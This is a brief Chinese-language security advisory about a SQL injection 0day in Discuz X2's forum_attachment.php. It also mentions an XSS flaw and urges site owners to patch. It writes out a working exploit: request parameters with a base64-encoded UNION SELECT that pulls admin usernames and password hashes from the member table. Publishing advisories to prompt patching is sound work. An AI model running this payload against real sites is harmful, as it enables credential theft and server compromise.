最近DiscuzX2被爆出了两个0day,一个是SQL注入漏洞,另一个是XSS注入漏洞,危害等级都较高,Nevel安全团队提醒广大站长朋友们对自己网站进行及时更新,或安装最新官方补丁。 SQL注入问题描述: SQL是一种数据库攻击方式,攻击者利用畸形的客户端输入,如果过滤不够,程序就会执行过多的数据库命令,从而会引发数据泄漏,服务器被入侵等一系列问题;危害等级高. 分析报告: 问题的具体原因发生在source/module/forum/forum_attachment.php,代码如下图: 其中$_G[‘gp_aid’]是由用户提交的变量aid所产生,而程序是将aid经过base64_decode后再传入SQL查询,在传入给SQL查询之前也没有作任何判断;但这正好给攻击者提供base64加密绕过Discuz自身的SQL攻击检测程序,从而产生SQL注入漏洞。 构造Sql_Exploit: mod=attachment //包含漏洞文件 findpost=imiyoo //保证$_G[‘gp_findpost’]不为空,使程序进入恶意SQL查询流程 aid=base64_encode(“1' and 1=2 union all select 1,concat(username,0x7C,password) from pre_common_member where username like 'admin|Nevel|Nevel|Nevel|Nevel”) //构造SQL利用语句爆出用户名和密码,其中后面有4个’|’用来产生5个变量
最近DiscuzX2被爆出了两个0day,一个是SQL注入漏洞,另一个是XSS注入漏洞,危害等级都较高,Nevel安全团队提醒广大站长朋友们对自己网站进行及时更新,或安装最新官方补丁。
